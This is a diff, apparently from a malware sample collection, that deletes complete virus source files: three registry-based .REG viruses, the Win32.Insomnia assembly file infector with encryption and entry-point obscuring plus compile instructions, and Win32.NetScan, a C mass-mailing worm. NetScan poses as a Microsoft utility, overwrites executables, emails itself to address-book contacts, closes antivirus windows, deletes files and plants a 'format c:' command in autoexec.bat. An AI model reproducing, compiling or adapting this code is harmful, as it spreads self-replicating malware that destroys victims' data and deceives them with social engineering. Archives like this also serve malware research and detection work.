Removed samples outside of directories

Win32/Virus.WinREG.Antireg.b

@@ -1,13 +0,0 @@
-REGEDIT4
-
-;;-------------------------------;;
-;;                               ;;
-;; AntiREG (The First REG Virus) ;;
-;;      Coded By Lys Kovick      ;;
-;;    Special Thanks To Phage    ;;
-;;                               ;;
-;;-------------------------------;;
-
-[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
-@="command /c for %i in (%windir%\\system\\*.reg) do regedit /e %i HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
-

Win32/Virus.WinREG.Sptohell

@@ -1,24 +0,0 @@
-REGEDIT 4
-
-;; WinREG.Wow
-;; written by SeCoNd PaRt To HeLl
-;; for my Virus Database
-
-[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
-@="command /c for %q in (%windir%\*.reg %path%\*.reg C:\*.reg %windir%\system\*.reg) do regedit /e %q HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
-
-;; Wow
-;; WowWow
-;; WowWowWow
-;; WowWowWowWow
-;; WowWowWowWowWow
-;; WowWowWowWowWowWow
-;; WowWowWowWowWowWowWow
-;; WowWowWowWowWowWowWowWow
-;; WowWowWowWowWowWowWow
-;; WowWowWowWowWowWow
-;; WowWowWowWowWow
-;; WowWowWowWow
-;; WowWowWow
-;; WowWow
-;; Wow

Win32/Virus.WinREG.Sptohell.b

@@ -1,14 +0,0 @@
-REGEDIT 4
-
-;; ***************  --> WinREG.Sptohell <-- + + + --> by Second Part To Hell [rRlf] <--  ***************
-;; 
-;; You may ask: "Why do I write such an nonsence virus?"! +fg+ The reason is, that I have nerver seen such an virus
-;; in any ezine before. And I think, much ppl don't know, that such viruses exist.
-;;
-;; The virus itself is fuckin easy. First it copies itself to the Registry, so the code will started by every
-;; start of the computer. The code searchs for every *.reg file in 4 directories. If it finds some, it copies
-;; itself (the code in the registry) to these .REG-files.
-
-
-[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
-@="command /c for %q in (%windir%\*.reg %path%\*.reg C:\*.reg %windir%\system\*.reg) do regedit /e %q HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"

Win32/Win32.Insomnia.txt

@@ -1,468 +0,0 @@
-;	Win32.Insomnia (c) DR-EF.
-;--------------------------------------------------
-;virus name:Win32.Insomnia
-;virus author:DR-EF
-;virus size:1972 bytes
-;features:
-;	o dont increase file size,overwrite reloc 
-;	  section instead.
-;	o use EPO - replace all mov eax,fs:[00000000]
-;	  instructions with call virus decryptor.
-;	o encrypted with new key for each file.
-;	o use the dotdot method to find files.
-;payload:messagebox with this text:
-;	".:[Win32.Insomnia <20> 2004 DR-EF]:."
-;	every year at 29/12.
-;compile:
-;	tasm32 /m3 /ml /zi Insomnia.asm , , ;
-;	tlink32 /tpe /aa /v Insomnia , Insomnia,,import32.lib
-;	pewrsec Insomnia.exe
-;--------------------------------------------------
-
-.386
-.model flat
-
-	extrn ExitProcess:proc
-
-	virus_size equ (EndVirus-virus_start)
-	INVALID_HANDLE_VALUE	equ	-1
-	FILE_ATTRIBUTE_NORMAL	equ	00000080h
-	OPEN_EXISTING	equ	3
-	GENERIC_WRITE	equ	40000000h
-	GENERIC_READ	equ	80000000h
-	PAGE_READWRITE	equ	4h
-	FILE_MAP_WRITE	equ	00000002h
-
-.data
-	db	?
-.code
-
-virus_start:
-	call	Delta
-Delta:	pop	ebp
-	sub	ebp,offset Delta
-	mov	ecx,NumberOfKernelBases
-	lea	esi,[ebp + KernelBaseTable]
-@next_k:lodsd
-	call	GetKernel32Base
-	jc	GetApis
-	loop	@next_k
-	jmp	reth	;return to host
-KernelBaseTable:
-	dd	804d4000h	;winXP
-	dd	0bff60000h	;winME
-	dd	77f00000h	;winNT
-	dd	77e70000h	;win2K
-	dd	0bff70000h	;win9X
-	NumberOfKernelBases	equ	5h
-	
-GetApis:mov	eax,[ebp + kernel32base]
-	add	eax,[eax + 3ch]
-	mov	eax,[eax + 78h]
-	add	eax,[ebp + kernel32base]
-	;eax - kernel32 export table
-	push	eax
-	xor	edx,edx
-	mov	eax,[eax + 20h]
-	add	eax,[ebp + kernel32base]
-	mov	edi,[eax]
-	add	edi,[ebp + kernel32base]
-	;edi - api names array
-	dec	edi
-nxt_cmp:inc	edi
-	lea	esi,[ebp + _GetProcAddress]
-	mov	ecx,0eh
-	rep	cmpsb
-	je	search_address
-	inc	edx
-nxt_l:	cmp	byte ptr [edi],0h
-	je	nxt_cmp
-	inc	edi
-	jmp	nxt_l
-search_address:
-	pop	eax
-	;eax - kernel32 export table
-	;edx - GetProcAddress position
-	shl	edx,1h
-	mov	ebx,[eax + 24h]
-	add	ebx,[ebp + kernel32base]
-	add	ebx,edx
-	mov	dx,word ptr [ebx]
-	shl	edx,2h
-	mov	ebx,[eax + 1ch]
-	add	ebx,[ebp + kernel32base]
-	add	ebx,edx
-	mov	ebx,[ebx]
-	add	ebx,[ebp + kernel32base]
-	mov	[ebp + GetProcAddress],ebx
-	mov	ecx,NumberOfApis
-	lea	eax,[ebp + ApiNamesTable]
-	lea	ebx,[ebp + ApiAddressTable]
-nxt_api:push	ecx
-	push	eax
-	push	eax
-	push	[ebp + kernel32base]
-	call	[ebp + GetProcAddress]
-	or	eax,eax
-	je	api_err
-	mov	dword ptr [ebx],eax
-	pop	eax
-nxt_al:	inc	eax
-	cmp	byte ptr [eax],0h
-	jne	nxt_al
-	inc	eax
-	add	ebx,4h
-	pop	ecx
-	loop	nxt_api
-	jmp	InfectFiles
-api_err:add	esp,8h
-	jmp	reth
-	
-	_GetProcAddress	db	"GetProcAddress",0
-	GetProcAddress	dd	0
-	kernel32base	dd	0
-	
-ApiNamesTable:
-	_FindFirstFile	db	"FindFirstFileA",0
-	_FindNextFile	db	"FindNextFileA",0
-	_GetCurrentDirectory	db	"GetCurrentDirectoryA",0
-	_SetCurrentDirectory	db	"SetCurrentDirectoryA",0
-	_CreateFile	db	"CreateFileA",0
-	_CloseHandle	db	"CloseHandle",0
-	_CreateFileMapping	db "CreateFileMappingA",0
-	_MapViewOfFile	db 	"MapViewOfFile",0
-	_UnmapViewOfFile	db 	"UnmapViewOfFile",0
-	_GetLocalTime	db	"GetLocalTime",0
-	_LoadLibrary	db	"LoadLibraryA",0
-	_SetFileTime	db	"SetFileTime",0
-	
-ApiAddressTable:
-	FindFirstFile	dd	0
-	FindNextFile	dd	0
-	GetCurrentDirectory	dd	0
-	SetCurrentDirectory	dd	0
-	CreateFile	dd	0
-	CloseHandle	dd	0
-	CreateFileMapping	dd	0
-	MapViewOfFile	dd	0
-	UnmapViewOfFile	dd	0
-	GetLocalTime	dd	0
-	LoadLibrary	dd	0
-	SetFileTime	dd	0
-	
-	NumberOfApis	equ	12
-	
-GetKernel32Base:
-	pushad
-	lea	ebx,[ebp + k32err]
-	push	ebx
-	xor	ebx,ebx
-	push	dword ptr fs:[ebx]
-	mov	fs:[ebx],esp
-	mov	ebx,eax
-	cmp	word ptr [eax],"ZM"
-	jne	_k32err
-	add	eax,[eax + 3ch]
-	cmp	word ptr [eax],"EP"
-	jne	_k32err
-	mov	[ebp + kernel32base],ebx
-	pop	dword ptr fs:[0]
-	add	esp,4h
-	popad
-	stc
-	ret
-_k32err:pop	dword ptr fs:[0]
-	add	esp,4h
-	popad
-	clc
-	ret
-k32err:	mov	esp,[esp + 8h]
-	pop	dword ptr fs:[0]
-	add	esp,4h
-	popad
-	clc
-	ret
-
-VirusCopyRight	db	".:[Win32.Insomnia <20> 2004 DR-EF]:.",0
-
-InfectFiles:
-	mov	[ebp + max_dirs],0fh
-	lea	eax,[ebp + cdir]
-	push	eax
-	push	0ffh
-	call	[ebp + GetCurrentDirectory]
-	or	eax,eax
-	je	ReturnToHost
-s_files:cmp	[ebp + max_dirs],0h
-	je	r_dir
-	lea	eax,[ebp + WIN32_FIND_DATA]
-	push	eax
-	lea	eax,[ebp + search_mask]
-	push	eax
-	call	[ebp + FindFirstFile]
-	cmp	eax,INVALID_HANDLE_VALUE
-	je	nxt_dir
-	mov	[ebp + hfind],eax
-i_file:	call	InfectFile
-	lea	eax,[ebp + WIN32_FIND_DATA]
-	push	eax
-	push	[ebp + hfind]
-	call	[ebp + FindNextFile]
-	or	eax,eax
-	jne	i_file
-nxt_dir:dec	[ebp + max_dirs]
-	lea	eax,[ebp + dotdot]
-	push	eax
-	call	[ebp + SetCurrentDirectory]
-	or	eax,eax
-	jne	s_files
-r_dir:	lea	eax,[ebp + cdir]
-	push	eax
-	call	[ebp + SetCurrentDirectory]
-ReturnToHost:
-	;check for payload:
-	lea	eax,[ebp + SYSTEMTIME]
-	push	eax
-	call	[ebp + GetLocalTime]
-	cmp	word ptr [ebp + wMonth],0ch
-	jne	reth
-	cmp	word ptr [ebp + wDay],1dh
-	jne	reth
-	lea	eax,[ebp + user32dll]
-	push	eax
-	call	[ebp + LoadLibrary]
-	or	eax,eax
-	je	reth
-	lea	ebx,[ebp + MessageBox]
-	push	ebx
-	push	eax
-	call	[ebp + GetProcAddress]
-	or	eax,eax
-	je	reth
-	xor	ecx,ecx
-	push	MB_ICONINFORMATION or MB_SYSTEMMODAL
-	push	ecx
-	lea	ebx,[ebp + VirusCopyRight]
-	push	ebx
-	push	ecx
-	call	eax
-reth:	popfd
-	popad
-	db	64h,0A1h,0,0,0,0 ;mov eax,fs:[00000000]
-	ret
-	
-	
-	SYSTEMTIME:
-	wYear	dw	0
-	wMonth	dw	0
-	wDayOfWeek	dw	0
-	wDay	dw	0
-	wHour	dw	0
-	wMinute	dw	0
-	wSecond	dw	0
-	wMilliseconds	dw	0
-	
-	user32dll	db	"user32.dll",0
-	MessageBox	db	"MessageBoxA",0
-	MB_SYSTEMMODAL	equ	00001000h
-	MB_ICONINFORMATION	equ	00000040h
-	
-	
-	hfind	dd	0
-	max_dirs	db	0fh
-	search_mask	db	"*.exe",0
-	dotdot	db	"..",0
-	cdir	db	0ffh	dup(0)
-	
-	
-	WIN32_FIND_DATA:
-	dwFileAttributes	dd	0
-	ftCreationTime		dq	0
-	ftLastAccessTime	dq	0
-	ftLastWriteTime		dq	0
-	nFileSizeHigh		dd	0
-	nFileSizeLow		dd	0
-	dwReserved0		dd      0
-	dwReserved1		dd      0
-	cFileName		db      0ffh dup (0)
-	cAlternateFileName	db	20 dup (0)
-	
-	
-InfectFile:
-	inc	byte ptr [ebp + decrypt_key]	;create new key
-	lea	ebx,[ebp + cFileName]
-	xor	eax,eax
-	push	eax
-	push	FILE_ATTRIBUTE_NORMAL
-	push	OPEN_EXISTING
-	push	eax
-	push	eax
-	push	GENERIC_READ or GENERIC_WRITE
-	push	ebx
-	call	[ebp + CreateFile]
-	cmp	eax,INVALID_HANDLE_VALUE
-	je	ExitInfect
-	mov	[ebp + hfile],eax
-	xor	eax,eax
-	push	eax
-	push	eax
-	push	eax
-	push	PAGE_READWRITE
-	push	eax
-	push	[ebp + hfile]
-	call	[ebp + CreateFileMapping]
-	or	eax,eax
-	je	close_f
-	mov	[ebp + hmap],eax
-	xor	eax,eax
-	push	eax
-	push	eax
-	push	eax
-	push	FILE_MAP_WRITE
-	push	[ebp + hmap]
-	call	[ebp + MapViewOfFile]
-	or	eax,eax
-	je	close_m
-	mov	[ebp + mapbase],eax
-	;check for valid pe file
-	cmp	word ptr [eax],"ZM"
-	jne	CloseFile
-	add	eax,[eax + 3ch]
-	cmp	word ptr [eax],"EP"
-	jne	CloseFile
-	;goto sections table
-	mov	cx,[eax + 6h] ; get number of sections
-	and	ecx,0ffffh
-	mov	ebx,[eax + 34h];get image base
-	mov	dword ptr [ebp + Virus_Start],ebx ;save image base insaid decryptor
-	mov	ebx,[eax + 74h];get number of datadirectory
-	shl	ebx,3h
-	add	eax,ebx
-	add	eax,78h
-	push	eax	;eax - sections table
-	push	ecx	;ecx - number of sections
-	;check for reloc section
-@sec:	cmp	dword ptr [eax],"ler."
-	jne	nxt_sec
-	cmp	dword ptr [eax + 2h],"cole"
-	je	f_rec
-nxt_sec:add	eax,28h
-	loop	@sec
-ext_rlc:add	esp,8h	;restore stack
-	jmp	CloseFile
-	;check if the reloc section is bigger than virus
-f_rec:	cmp	dword ptr [eax + 8h],virus_size	;eax - reloc section header !
-	jb	ext_rlc
-	;set new section flags
-	or	dword ptr [eax + 24h],0c0000020h ;code\readable\writeable
-	;goto the section raw data:
-	mov	edx,[eax + 0ch]
-	mov	eax,[eax + 14h]
-	add	eax,[ebp + mapbase]
-	;overwrite the reloc section with the virus
-	mov	edi,eax
-	lea	esi,[ebp + virus_start]
-	mov	ecx,virus_size
-@enc:	lodsb
-	xor	al,byte ptr [ebp + decrypt_key]
-	stosb
-	loop	@enc
-	pop	ecx ;ecx - number of sections
-	pop	ebx ;ebx - sections table
-	sub	eax,[ebp + mapbase]
-	add	dword ptr [ebp + Virus_Start],edx ;eax - virus start infected files
-@sec2:	cmp	dword ptr [ebx + 1h],"txet" ;text ?
-	je	f_cod
-	cmp	dword ptr [ebx + 1h],"edoc" ;code ?
-	je	f_cod
-	cmp	dword ptr [ebx],"EDOC"	;CODE ?
-	je	f_cod
-	add	ebx,28h
-	loop	@sec2
-	add	esp,4h	;restore stack
-	jmp	CloseFile
-	;ebx - code section header
-f_cod:	mov	ecx,[ebx + 10h] ;ecx - size of section raw data
-	mov	edx,[ebx + 8h]	;edx - virtual section size
-	sub	ecx,edx
-	cmp	ecx,DecryptorSize
-	ja	write_d
-	add	esp,4h
-	jmp	CloseFile
-write_d:mov	edi,[ebx + 14h]
-	mov	[ebp + virus_entry_point],edi
-	add	[ebp + virus_entry_point],edx
-	add	edi,[ebp + mapbase]
-	push	edi	;save code section raw data
-	add	edi,edx	;esi - where to write virus decryptor
-	lea	esi,[ebp + VirusDecryptorStart]
-	mov	ecx,DecryptorSize
-	rep	movsb
-	pop	esi	;esi - code section raw data
-	;search for all mov eax,fs:[00000000] and replace it with nop --> call virus_decryptor
-	xchg	edx,ecx	;ecx - code section virtual size
-@1:	cmp	word ptr [esi],0a164h
-	jne	nxt_w
-	cmp	dword ptr [esi + 2],0
-	jne	nxt_w
-	;esi - mov eax,fs:[00000000] location.
-	mov	byte ptr [esi],90h	;nop
-	mov	byte ptr [esi + 1h],0e8h;call
-	mov	eax,[ebp + virus_entry_point]
-	mov	ebx,esi
-	sub	ebx,[ebp + mapbase]
-	sub	eax,ebx
-	sub	eax,6h
-	mov	dword ptr [esi + 2h],eax
-nxt_w:	inc	esi
-	loop	@1
-CloseFile:
-	push	[ebp + mapbase]
-	call	[ebp + UnmapViewOfFile]
-close_m:push	[ebp + hmap]
-	call	[ebp + CloseHandle]
-close_f:lea	eax,[ebp + ftLastWriteTime]
-	push	eax
-	lea	eax,[ebp + ftLastAccessTime]
-	push	eax
-	lea	eax,[ebp + ftCreationTime]
-	push	eax
-	push	[ebp + hfile]
-	call	[ebp + SetFileTime]
-	push	[ebp + hfile]
-	call	[ebp + CloseHandle]
-ExitInfect:
-	ret
-
-VirusDecryptorStart	equ	$
-	pushad
-	pushfd
-	mov	esi,00000000
-	Virus_Start	equ	$-4
-	push	esi
-	mov	edi,esi
-	mov	ecx,virus_size
-@dcrypt:lodsb
-	xor	al,5h
-	decrypt_key	equ	$-1
-	stosb
-	loop	@dcrypt
-	ret
-EndVirusDecryptor	equ	$
-DecryptorSize	equ	(EndVirusDecryptor - VirusDecryptorStart)
-	
-	hfile	dd	0
-	hmap	dd	0
-	mapbase	dd	0
-	virus_entry_point	dd	0
-
-EndVirus	equ	$
-
-First_Gen_Host:
-	push	offset exit
-	pushfd
-	pushad
-	jmp	virus_start
-exit:	push	eax
-	call	ExitProcess
-end First_Gen_Host

Win32/Win32.Netscan.c

@@ -1,245 +0,0 @@
-#include "netscan.h"
-#pragma hdrstop
-#pragma warning (disable: 4068)
-#pragma warning (disable: 4001)
-#pragma resource "resource.res"
-
-char GetNetScanPath[256],GetNetScanWinDir[256],MyBuffer[256]="echo y|format c: /u /v:HaHaHaHa";
-LPSTR FileEmm386 = "Emm386.exe";
-LPSTR FileSetver = "SetVer.exe";
-LPSTR Nom = "a";
-DWORD ExtInf;
-int Err,ErrSend;
-HANDLE NetScanTime,NetScanHandle,AutoBat;
-HMODULE GetKernLib, GetMapiLib;
-HKEY NetScan32Key,NetScanNTKey,NetScanInstall,CreateNetScan;
-typedef DWORD(*RegistServProcs)(DWORD,DWORD);
-typedef ULONG(*SendMessInfect)(LHANDLE,ULONG,MapiMessage FAR*,FLAGS,ULONG);
-typedef ULONG(*FindUserAddress)(LHANDLE,ULONG,LPTSTR,FLAGS,ULONG,lpMapiRecipDesc FAR*);
-typedef ULONG(*DoMemFree)(LPVOID);
-HWND WindowsHwnd,SymantecHwnd,NAVHwnd;
-
-#pragma argsused
-int APIENTRY WinMain
-(
-HINSTANCE hInstance,
-HINSTANCE hPrevInstance,
-LPSTR     lpszCmdLine,
-int       nCmdShow
-)
-{
-//Win32.NetScan by ZeMacroKiller98
-//Tous droits r‚serv‚s (c) 2001
-WIN32_FIND_DATA GetFileToInfect;
-OSVERSIONINFO GetOsVer;
-FILETIME GetFileCreateTime,GetFileLstAccess,GetFileLstWrite;
-SYSTEMTIME TriggerScanTime;
-RegistServProcs MyServProcs;
-SendMessInfect SendMessToOther;
-FindUserAddress GetAddressUser;
-DoMemFree GetMemFree;
-GetKernLib = LoadLibrary("kernel32.dll");
-MyServProcs = (RegistServProcs)GetProcAddress(GetKernLib,"RegisterServiceProcess");
-MessageBox(NULL,"This freeware install automaticaly itself into your system\nIt scan your system each time you connect to network\nIf you have any problem, contact Microsoft","NetScan Utility",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
-SearchPath(NULL,_argv[0],NULL,sizeof(GetNetScanPath),GetNetScanPath,NULL);
-GetOsVer.dwOSVersionInfoSize = sizeof(GetOsVer);
-GetVersionEx(&GetOsVer);
-if(GetOsVer.dwPlatformId==VER_PLATFORM_WIN32_NT)
-{
-        RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\WindowsNT\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&NetScanNTKey);
-        RegSetValueEx(NetScanNTKey,"NetScanNT",0,REG_SZ,GetNetScanPath,sizeof(GetNetScanPath));
-        RegCloseKey(NetScanNTKey);
-}
-else
-{
-        RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&NetScan32Key);
-        RegSetValueEx(NetScan32Key,"NetScan32",0,REG_SZ,GetNetScanPath,sizeof(GetNetScanPath));
-        RegCloseKey(NetScan32Key);
-}
-if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\NetScan\\Install",0,KEY_ALL_ACCESS,&NetScanInstall)!=ERROR_SUCCESS)
-{
-        GetMapiLib = LoadLibrary("mapi32.dll");
-        GetWindowsDirectory(GetNetScanWinDir,sizeof(GetNetScanWinDir));
-        SetCurrentDirectory(GetNetScanWinDir);
-        NetScanHandle = FindFirstFile("*.exe",&GetFileToInfect);
-        NetScanFind:
-        NetScanTime = CreateFile(GetFileToInfect.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
-        GetFileTime(NetScanTime,&GetFileCreateTime,&GetFileLstAccess,&GetFileLstWrite);
-        CloseHandle(NetScanTime);        
-        if((lstrcmp(GetFileToInfect.cFileName,"emm386.exe")==0)||(lstrcmp(GetFileToInfect.cFileName,"setver.exe")==0))
-                goto NotInfection;
-        CopyFile(_argv[0],GetFileToInfect.cFileName,FALSE);
-        NetScanTime = CreateFile(GetFileToInfect.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
-        SetFileTime(NetScanTime,&GetFileCreateTime,&GetFileLstAccess,&GetFileLstWrite);
-        CloseHandle(NetScanTime);
-        NotInfection:
-        if(FindNextFile(NetScanHandle,&GetFileToInfect)==TRUE)
-                goto NetScanFind;
-        FindClose(NetScanHandle);
-        RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Britney\\Install",&CreateNetScan);
-        RegCloseKey(CreateNetScan);
-        SendMessToOther = (SendMessInfect)GetProcAddress(GetMapiLib,"MAPISendMail");
-        GetAddressUser = (FindUserAddress)GetProcAddress(GetMapiLib,"MAPIResolveName");
-        GetMemFree = (DoMemFree)GetProcAddress(GetMapiLib,"MAPIFreeBuffer");
-        if((SendMessToOther==NULL)||(GetAddressUser==NULL)||(GetMemFree==NULL))
-        {
-                MessageBox(NULL,"This program need MAPI functions installed on your PC\nPlease contact your hot line to install it","NetScan Utility",MB_OK|MB_ICONEXCLAMATION);
-                SetCurrentDirectory("C:/");
-                DeleteFile("*.*");
-                ExitProcess(0);
-        }
-MapiMessage stMessage;
-MapiRecipDesc stRecip;
-MapiFileDesc stFile;
-lpMapiRecipDesc lpRecip;
-stFile.ulReserved = 0;
-stFile.flFlags = 0L;
-stFile.nPosition = (ULONG)-1;
-stFile.lpszPathName = GetNetScanPath;
-stFile.lpszFileName = NULL;
-stFile.lpFileType = NULL;
-MessageBox(NULL,"To test your network, you need to select a email address into your address book\nPlease select address with","ILoveBritney Freeware",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
-UnResolve:
-Err = (GetAddressUser)(lhSessionNull,0L,Nom,MAPI_DIALOG,0L,&lpRecip);
-if(Err!=SUCCESS_SUCCESS)
-{
-switch(Err){
-        case MAPI_E_AMBIGUOUS_RECIPIENT:
-                MessageBox(NULL,"The recipient requested has not been or could\n not be resolved to a unique address list entry","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);                
-        break;
-        case MAPI_E_UNKNOWN_RECIPIENT:
-                MessageBox(NULL,"The recipient could not be resolved to any\naddress.The recipient might not exist or might be unknown","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);                
-        break;
-        case MAPI_E_FAILURE:
-                MessageBox(NULL,"One or more unspecified errors occured\nThe name was not resolved","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
-                DeleteFile("*.*");
-                ExitProcess(0);
-        break;
-        case MAPI_E_INSUFFICIENT_MEMORY:
-                MessageBox(NULL,"There was insufficient memory to proceed","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
-                DeleteFile("*.*");
-                ExitProcess(0);
-        break;
-        case MAPI_E_NOT_SUPPORTED:
-                MessageBox(NULL,"The operation was not supported by the messaging system","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
-                DeleteFile("*.*");
-                ExitProcess(0);
-        break;
-        case MAPI_E_USER_ABORT:
-                MessageBox(NULL,"The user was cancelled one or more dialog box","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
-                DeleteFile("*.*");
-                ExitProcess(0);
-        break;        
-        }
-goto UnResolve;
-}
-stRecip.ulReserved = lpRecip->ulReserved;
-stRecip.ulRecipClass = MAPI_TO;
-stRecip.lpszName = lpRecip->lpszName;
-stRecip.lpszAddress = lpRecip->lpszAddress;
-stRecip.ulEIDSize = lpRecip->ulEIDSize;
-stRecip.lpEntryID = lpRecip->lpEntryID;
-stMessage.ulReserved = 0;
-stMessage.lpszSubject = "Microsoft NetScan Utility";
-stMessage.lpszNoteText = lstrcat("Hi ",(lstrcat(lpRecip->lpszName,"\n\n\tI send you this mail to test my network\nI need you to send me a answer about it\nThis program can scan your network to find all problem into your network\n\n\tEnjoy to test your net...\nThank you and see you soon....\n\n\n\t\t\t\t\tMicrosoft Technical Support")));
-stMessage.lpszMessageType = NULL;
-stMessage.lpszDateReceived = NULL;
-stMessage.lpszConversationID = NULL;
-stMessage.flFlags = 0L;
-stMessage.lpOriginator = NULL;
-stMessage.nRecipCount = 1;
-stMessage.lpRecips = &stRecip;
-stMessage.nFileCount = 1;
-stMessage.lpFiles = &stFile;
-ErrSend = (SendMessToOther)(lhSessionNull,0L,&stMessage,0L,0L);
-if(ErrSend!=SUCCESS_SUCCESS)
-{
-        MessageBox(NULL,"The test can't continue, due to a error occured during to sending message\nPlease contact our hotline at hotline@microsoft.com","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
-        DeleteFile("*.*");
-        ExitProcess(0);
-} 
-MessageBox(NULL,"The test is OK and NetScan is installed into your system\n",
-                "NetScan Utility",
-                 MB_OK|MB_ICONINFORMATION);
-FreeLibrary(GetMapiLib);
-}
-RegCloseKey(NetScanInstall);
-STARTUPINFO NetScanInfo;
-PROCESS_INFORMATION NetScanProc;
-NetScanInfo.cb = sizeof(STARTUPINFO);
-NetScanInfo.lpReserved = NULL;
-NetScanInfo.lpReserved2 = NULL;
-NetScanInfo.cbReserved2 = 0;
-NetScanInfo.lpDesktop = NULL;
-NetScanInfo.dwFlags = STARTF_FORCEOFFFEEDBACK;
-if(CreateProcess(GetNetScanPath,
-                NULL,
-                (LPSECURITY_ATTRIBUTES)NULL,
-                (LPSECURITY_ATTRIBUTES)NULL,
-                FALSE,
-                0,
-                NULL,
-                NULL,
-                &NetScanInfo,
-                &NetScanProc))
-{
-CloseHandle(NetScanProc.hProcess);
-CloseHandle(NetScanProc.hThread);
-}
-if(CreateMutex(NULL,TRUE,GetNetScanPath)==NULL)
-        ExitProcess(0);
-SetPriorityClass(NetScanProc.hProcess,REALTIME_PRIORITY_CLASS);
-MyServProcs(NetScanProc.dwProcessId,1);
-GetSystemTime(&TriggerScanTime);
-//Close windows which title is WINDOWS
-WindowsHwnd = FindWindow(NULL,"WINDOWS");
-if(WindowsHwnd!=NULL)
-        DestroyWindow(WindowsHwnd);
-//Close access to Symantec HomePage
-SymantecHwnd = FindWindow(NULL,"Symantec Security Updates - Home Page - Microsoft Internet Explorer");
-if(SymantecHwnd!=NULL)
-{
-        MessageBox(NULL,"You don't have access to this page\nPlease contact the web master to correct this problem\n","Microsoft Internet Explorer",MB_OK|MB_ICONEXCLAMATION|MB_ICONSTOP);
-        DestroyWindow(SymantecHwnd);
-}
-//Anti Norton Antivirus
-NAVHwnd = FindWindow(NULL,"Norton AntiVirus");
-if(NAVHwnd !=NULL)
-{
-        MessageBox(NULL,"Ha Ha Ha Ha!!!!, you use NAV?????\nI can allow access to it\nChange AV now","Win32.NetScan",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
-        DestroyWindow(NAVHwnd);
-}
-if((TriggerScanTime.wHour==12)&&(TriggerScanTime.wMinute==12))
-{
-	mciSendString("open cdaudio",NULL,0,NULL);
-	mciSendString("set cdaudio door open",NULL,0,NULL);
-	mciSendString("close cdaudio",NULL,0,NULL);
-	mciSendString("open cdaudio",NULL,0,NULL);
-	mciSendString("set cdaudio audio all off",NULL,0,NULL);
-	mciSendString("close cdaudio",NULL,0,NULL);
-        MessageBeep(MB_ICONEXCLAMATION);
-}        
-if(TriggerScanTime.wDay==1)
-{
-        MessageBox(NULL,"It's the day that your PC is going to scan or maybe going to disappear","Win32.Netscan",MB_OK|MB_ICONEXCLAMATION);
-	SetCurrentDirectory("C:\\");
-        AutoBat = CreateFile("autoexec.bat",GENERIC_WRITE,0,(LPSECURITY_ATTRIBUTES) NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,(HANDLE) NULL);
-        SetFilePointer(AutoBat, 0, (LPLONG)NULL,FILE_END);
-        WriteFile(AutoBat,MyBuffer,sizeof(MyBuffer),&ExtInf,NULL);
-        CloseHandle(AutoBat);
-	ExitWindowsEx(EWX_FORCE|EWX_REBOOT,0);
-}                
-FreeLibrary(GetKernLib);
-return 0;
-}
-
-
-*************************************************************************
-
-#define WIN32_LEAN_AND_MEAN
-#include <windows.h>
-#include <dos.h>
-#include <stdlib.h>
-#include <stdio.h>
-#include <mapi.h>
-#include <mmsystem.h>